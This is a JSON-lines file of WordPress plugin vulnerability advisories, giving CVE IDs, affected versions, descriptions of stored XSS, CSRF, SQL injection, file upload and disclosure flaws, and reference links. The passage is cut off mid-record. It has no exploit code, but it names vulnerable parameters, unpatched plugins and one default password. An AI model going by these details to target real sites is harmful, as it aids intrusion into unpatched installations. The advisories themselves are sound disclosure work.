{"CVE_ID":"CVE-2024-0681","slug":"page-and-post-restriction","versionImpact":"1.3.4","description":"The Page Restriction WordPress (WP) \u2013 Protect WP Pages\/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4. This is due to the plugin not properly restricting access to pages via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected pages. The vendor has decided that they will not implement REST API protection on posts and pages and the restrictions will only apply to the front-end of the site. The vendors solution was to add notices throughout the dashboard and recommends installing the WordPress REST API Authentication plugin for REST API coverage.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4474","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71954c60-6a5b-4cac-9920-6d9b787ead9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71954c60-6a5b-4cac-9920-6d9b787ead9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7655","slug":"peepso-core","versionImpact":"6.4.5.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e85ee611-ae81-4736-b4f0-b9d06714da18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e85ee611-ae81-4736-b4f0-b9d06714da18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/6-4-6-0\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/6-4-6-0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigfields.php?rev=3147528#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigfields.php?rev=3147528#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9591","slug":"wp-custom-taxonomy-image","versionImpact":"1.0.0","description":"The Category and Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_category_image' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5760933b-30e6-465b-9b94-c913b21f07fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5760933b-30e6-465b-9b94-c913b21f07fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-image\\\/trunk\\\/wp-custom-taxonomy-image.php?rev=1454210#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-image\\\/trunk\\\/wp-custom-taxonomy-image.php?rev=1454210#L47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9426","slug":"aqua-svg-sprite","versionImpact":"3.0.14","description":"The Aqua SVG Sprite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4c1809-d79f-4505-8f0a-9ec534c8fea2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4c1809-d79f-4505-8f0a-9ec534c8fea2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aqua-svg-sprite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aqua-svg-sprite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1311","slug":"wcfm-marketplace-rest-api","versionImpact":"1.6.2","description":"The WooCommerce Multivendor Marketplace \u2013 REST API plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in the update_delivery_status() function in all versions up to, and including, 1.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/trunk\\\/includes\\\/api\\\/class-api-deliveries-controller.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/trunk\\\/includes\\\/api\\\/class-api-deliveries-controller.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wcfm-marketplace-rest-api\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wcfm-marketplace-rest-api\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ff5cda2-edcd-4fa5-9c8e-427a43802ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ff5cda2-edcd-4fa5-9c8e-427a43802ed1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4336","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_file() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable by unauthenticated attackers in default configurations where the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4336\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4336\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5323dbb7-3893-4b43-838b-6326505b2fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5323dbb7-3893-4b43-838b-6326505b2fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0730","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4104f69f-b185-498a-aabf-2126ffb94ab3\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4104f69f-b185-498a-aabf-2126ffb94ab3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0691","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_last_name' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about arbitrary form submissions, specifically the submitter's last name.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fc4b815-dc05-4270-bf7a-3b01622739d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fc4b815-dc05-4270-bf7a-3b01622739d7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2330","slug":"gsheetconnector-caldera-forms","versionImpact":"1.2","description":"The Caldera Forms Google Sheets Connector WordPress plugin through 1.2 does not have a CSRF check when updating its Access Code, which could allow attackers to make a logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa8ccdd0-7b23-4b12-9aa9-4b29d47256b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa8ccdd0-7b23-4b12-9aa9-4b29d47256b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1411","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.15","description":"The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the settings of the Twitter Buttons Widget in all versions up to, and including, 2.7.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3035790\\\/powerpack-lite-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3035790\\\/powerpack-lite-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0631","slug":"duitku-social-payment-gateway","versionImpact":"2.11.4","description":"The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.4. This makes it possible for unauthenticated attackers to change the payment status of orders to failed.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duitku-social-payment-gateway\\\/trunk\\\/woocommerce-gateway-duitku.php#L409\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duitku-social-payment-gateway\\\/trunk\\\/woocommerce-gateway-duitku.php#L409\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4384","slug":"cssable-countdown","versionImpact":"1.5","description":"The CSSable Countdown WordPress plugin through 1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad714196-2590-4dc9-b5b9-50808e9e0d26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad714196-2590-4dc9-b5b9-50808e9e0d26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7416","slug":"reveal-template","versionImpact":"3.7","description":"The Reveal Template plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.7. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34a36da0-a101-4c5a-bacb-9f131bded819?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34a36da0-a101-4c5a-bacb-9f131bded819?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reveal-template\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reveal-template\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7618","slug":"peepso-core","versionImpact":"6.4.5.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.4.0\\\/templates\\\/reactions\\\/admin_reaction.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.4.0\\\/templates\\\/reactions\\\/admin_reaction.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigreactions.php?rev=3147528#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigreactions.php?rev=3147528#L88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9590","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image meta field value in the 'wpaft_add_meta_textinput' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/wp-texonomy-meta.php?rev=1454207#L631\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/wp-texonomy-meta.php?rev=1454207#L631\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8985","slug":"social-proof-testimonials-slider","versionImpact":"2.2.4","description":"The Social Proof (Testimonial) Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spslider-block shortcode in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49460db5-a0cd-4b29-85f2-8ededabf5599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49460db5-a0cd-4b29-85f2-8ededabf5599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/tags\\\/2.2.4\\\/public\\\/class-social-proof-slider-public.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/tags\\\/2.2.4\\\/public\\\/class-social-proof-slider-public.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/trunk\\\/public\\\/class-social-proof-slider-public.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/trunk\\\/public\\\/class-social-proof-slider-public.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-proof-testimonials-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-proof-testimonials-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0807","slug":"cits-support-svg-webp-media-upload","versionImpact":"4.2","description":"The CITS Support svg, webp Media and TTF,OTF File Upload, Use Custom Fonts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation on the cits_settings_tab() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3772ddad-4960-48c8-904e-2457d12bd01c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3772ddad-4960-48c8-904e-2457d12bd01c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5055","slug":"smart-forms","versionImpact":"2.6.98","description":"The Smart Forms \u2013 when you need more than just a contact form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6.98 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f52cbb4-8fe3-4402-8ece-261d32329a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f52cbb4-8fe3-4402-8ece-261d32329a42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0727","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_delete_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b56928-7125-4211-b233-07b5b51881c1\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b56928-7125-4211-b233-07b5b51881c1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5975","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 